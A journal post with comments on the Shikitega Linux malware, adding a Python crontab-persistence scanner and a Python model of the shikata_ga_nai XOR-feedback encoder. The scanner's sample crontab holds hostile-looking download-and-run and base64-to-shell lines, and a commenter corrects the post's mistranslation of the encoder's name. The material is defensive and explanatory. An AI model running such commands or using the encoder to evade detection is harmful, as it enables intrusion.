
Journal by Mojibake Tengu

A new brand of Linux malware nicknamed Shikitega has appeared, and it is quite well documented by AT&T Alien Labs' analysis:

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

Well, I would not call crontab persistence a stealthy method, but maybe I am just getting too old and this really is stealthy for current Linux youngsters.

What is interesting to me is the initial code mechanic, using the Shikata Ga Nai (means: On the Way) encoder. I grade this one as "not bad". I've seen better coding styles, though.

The following stages are just common stuff; the overall thingy looks like many pieces of code of differing quality glued together as a contraption to build some kind of on-demand solution.

Since Ethereum is changing its algorithm from a heavy GPU load to a "low energy" one, I predict many more similar plagues against Linux clouds will happen.
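
The crontab persistence mentioned above is the kind of thing a defender can actually check for. Below is an added example in Python, not code from the journal, from Shikitega or from the AT&T write-up: a heuristic scanner over user-crontab text. The rule names, the function names and the sample crontab are my own constructions, not indicators published for Shikitega, and the parser assumes the user-crontab layout (five schedule fields or an @tag, then the command, with no user column).

```python
# Added example: heuristic scan of user-crontab text for the kind of
# persistence entry the journal mentions. The rules, the function names and
# the sample crontab are my own constructions, not indicators published for
# Shikitega. Assumes user-crontab format (five schedule fields or an @tag,
# then the command; no user column as in /etc/crontab).
import re
from typing import Dict, List, Optional, Tuple

SCHEDULE_FIELDS = 5

# Command-level rules, deliberately generic; list order is the hit order.
COMMAND_RULES = [
    ("download-and-run", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da)?sh\b")),
    ("pipe-to-shell",    re.compile(r"\|\s*(?:ba|da)?sh\b")),
    ("base64-decode",    re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("exec-from-tmp",    re.compile(r"(?:^|[\s;|&])(?:/tmp|/var/tmp|/dev/shm)/")),
    # a path component starting with '.', but not '..' or './'
    ("hidden-path",      re.compile(r"/\.(?!\.)[^/\s]")),
]


def parse_entry(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a job line; None for blanks, comments
    and environment assignments such as SHELL=/bin/sh."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_]\w*=", s):
        return None
    if s.startswith("@"):                      # @reboot, @daily, ...
        tag, _, cmd = s.partition(" ")
        return tag, cmd.strip()
    parts = s.split(None, SCHEDULE_FIELDS)
    if len(parts) <= SCHEDULE_FIELDS:          # schedule without a command
        return None
    return " ".join(parts[:SCHEDULE_FIELDS]), parts[SCHEDULE_FIELDS]


def schedule_hits(schedule: str) -> List[str]:
    """Schedules that are typical of persistence rather than housekeeping."""
    hits = []
    if schedule == "@reboot":
        hits.append("at-boot")
    elif schedule == "* * * * *":
        hits.append("every-minute")
    return hits


def scan_crontab(text: str) -> List[Dict[str, object]]:
    """One finding per job line that trips at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        hits = schedule_hits(schedule)
        hits += [name for name, rx in COMMAND_RULES if rx.search(command)]
        if hits:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "hits": hits})
    return findings


def scan_file(path: str) -> List[Dict[str, object]]:
    """Scan a crontab file on disk, e.g. /var/spool/cron/crontabs/<user>."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_crontab(fh.read())


# Constructed sample, not a real capture; 203.0.113.0/24 is a documentation range.
SAMPLE_CRONTAB = "\n".join([
    "# constructed sample crontab",
    "SHELL=/bin/sh",
    "PATH=/usr/bin:/bin",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "* * * * * /home/deploy/.local/.cache/.x/run >/dev/null 2>&1",
    "@reboot /var/tmp/.sys/loader",
    "*/5 * * * * curl -s http://203.0.113.5/p.sh | sh",
    "0 * * * * echo aGVsbG8= | base64 -d | sh",
])

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['hits'])}: {f['command']}")
```

On Debian-derived systems user crontabs live under /var/spool/cron/crontabs and on Red Hat-derived ones under /var/spool/cron; system jobs sit in /etc/crontab and /etc/cron.d, which carry an extra user column this parser does not handle. Hits are leads, not verdicts: hidden-path and every-minute are the noisy ones, while download-and-run in a crontab is almost never legitimate.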

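The "initial code mechanic" the journal finds interesting is the XOR additive-feedback transform that shikata_ga_nai is built on. The following is an added Python model of that transform; it is not Shikitega's code and not Metasploit's encoder, and it leaves out the part that does the real work in practice, the polymorphic x86/x64 decoder stub emitted in machine code. The function names, the 0x90 padding byte and the sample payloads are my own assumptions.

```python
# Added example: Python model of the XOR additive-feedback scheme that
# shikata_ga_nai uses. It is not Shikitega's or Metasploit's code; the real
# encoder prepends a polymorphic x86/x64 decoder stub, which is not modelled.
# Function names, the 0x90 padding byte and the sample payloads are assumptions.
import os
import struct
from typing import Optional, Tuple

MASK32 = 0xFFFFFFFF


def sgn_encode(payload: bytes, key: Optional[int] = None) -> Tuple[int, bytes]:
    """Encode payload under a 32-bit key (random if not given).

    Each little-endian dword is XORed with the running key, then the key is
    advanced by adding the plaintext dword (the additive feedback). A fresh
    key therefore changes every output byte, and an error in one dword
    propagates into all later ones.
    """
    if key is None:
        key = struct.unpack("<I", os.urandom(4))[0]
    # Pad to a dword boundary; 0x90 (NOP) is our own choice of filler.
    padded = payload + b"\x90" * (-len(payload) % 4)
    out = bytearray()
    k = key
    for (orig,) in struct.iter_unpack("<I", padded):
        out += struct.pack("<I", orig ^ k)
        k = (k + orig) & MASK32
    return key, bytes(out)


def sgn_decode(key: int, blob: bytes) -> bytes:
    """Inverse of sgn_encode: the arithmetic the decoder stub loops over."""
    out = bytearray()
    k = key
    for (enc,) in struct.iter_unpack("<I", blob):
        orig = enc ^ k
        out += struct.pack("<I", orig)
        k = (k + orig) & MASK32
    return bytes(out)


def encodings_differ(payload: bytes) -> bool:
    """Encode the same payload twice with random keys; True if the two
    ciphertexts differ (so one byte signature cannot cover both)."""
    _, a = sgn_encode(payload)
    _, b = sgn_encode(payload)
    return a != b


def desync_count(payload: bytes, key: int) -> int:
    """Flip one bit in the first encoded byte and count the decoded dwords
    that no longer match: shows how the feedback spreads the damage."""
    _, blob = sgn_encode(payload, key)
    damaged = bytes([blob[0] ^ 1]) + blob[1:]
    good = struct.iter_unpack("<I", sgn_decode(key, blob))
    bad = struct.iter_unpack("<I", sgn_decode(key, damaged))
    return sum(1 for g, b in zip(good, bad) if g != b)


if __name__ == "__main__":
    key, blob = sgn_encode(b"/bin/sh\x00")
    print(f"key=0x{key:08x} encoded={blob.hex()} decoded={sgn_decode(key, blob)!r}")
```

Two encodings of the same payload differ in essentially every byte, which is why a static signature over the encoded body is pointless. What detection keys on instead is the short decoder stub (the x86 version famously locates itself with an fnstenv trick, and emulators recognise the decode loop) and, as the journal says, the behaviour after decoding: the dropped files and the crontab entry.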
  • (Score: 3, Interesting) by RS3 (6367) on Friday September 16 2022, @02:28PM (#1271979)

    Thanks. I skimmed / read TFA and it's pretty good, great reverse-engineering and analysis. What I like is they actually tell you what files to look for and where. Far too many malware articles babble on and on about malware, patch and update, but rarely give you specific symptoms to look for.

    What's missing: they refer to the "infected system", but they don't tell you how the infection gets in. Maybe I missed it, but I looked a couple of times...

    • (Score: 0) by Anonymous Coward on Friday September 16 2022, @09:47PM (#1272013)

      With malware like this, it isn't uncommon for there to be multiple vectors and even multiple parties using the same malware in different campaigns. Stuff like this is commonly bought and sold on the black market or leased in some form of *aaS scheme. With the precipitous rise in such services, now you have to analyze the initial infection and the payload as separate incidents, because it is no longer the case that the payload tells you how it got in and vice versa.

      • (Score: 2) by RS3 (6367) on Saturday September 17 2022, @02:52AM (#1272056)

        Good answer, thanks. What I was trying to get at: how to be more safe. If you know the most common way a particular malware gets into a system, you might be able to take measures to reduce the vulnerability.

        • (Score: 0) by Anonymous Coward on Saturday September 17 2022, @04:31AM (#1272065)

          How to be more safe is to follow proper security measures. Yes, it can be a pain in the ass to properly configure things, stay updated, keep your exposure to a minimum, not attract unwanted attention, and understand the entire stack you are running, but ultimately it is the only way to be relatively safe. There are guides and rules on how to do it in particular, but most don't care because the secure way isn't usually the easy way.

          In this particular instance, the malware is a cryptominer. It is probably run as part of an illegal Mining as a Service scheme. Given the intermediate C&C and dual intermediate payload, they probably paid a Malware as a Service provider to drop it. There may even be a third Exploit as a Service provider involved for the initial infection. There just isn't some magic bullet to keep you safe short of not exposing random listening ports to the Internet, especially without the necessary security in between.

  • (Score: 2) by DeathMonkey (1380) on Friday September 16 2022, @04:48PM (#1271994)

    How are we feeling about the Ethereum news? My biggest complaint about Bitcoin is the energy usage, so is this thing the future?

    • (Score: 0) by Anonymous Coward on Saturday September 17 2022, @10:48PM (#1272199)

      PoS is PoW, except you substitute "stakeholders" for "workers" and "amount of stake" for "amount of work." Theoretically, this means that it is vulnerable to the same attacks as PoW and has similar properties. Of course, the chosen algorithm affects what the exact security, efficiency, etc. picture looks like, with some performing better than others. It also has the side effect of automatically making those with the most currency even richer, in both currency due to the algorithm and real money due to the barrier of entry.

  • (Score: 3, Informative) by stormwyrm (717) on Wednesday September 21 2022, @03:14AM (#1272683)

    Shikata ga nai (仕方がない) does not mean "on the way". It's a Japanese expression [wikipedia.org] that means "there's no other way", "it can't be helped", "it's no use (doing)", "unavoidable", or "inevitable". Usually used when something unpleasant has happened or is about to happen that one can't do anything about, or one is in difficult circumstances that one has to go through.

    --
    Numquam ponenda est pluralitas sine necessitate.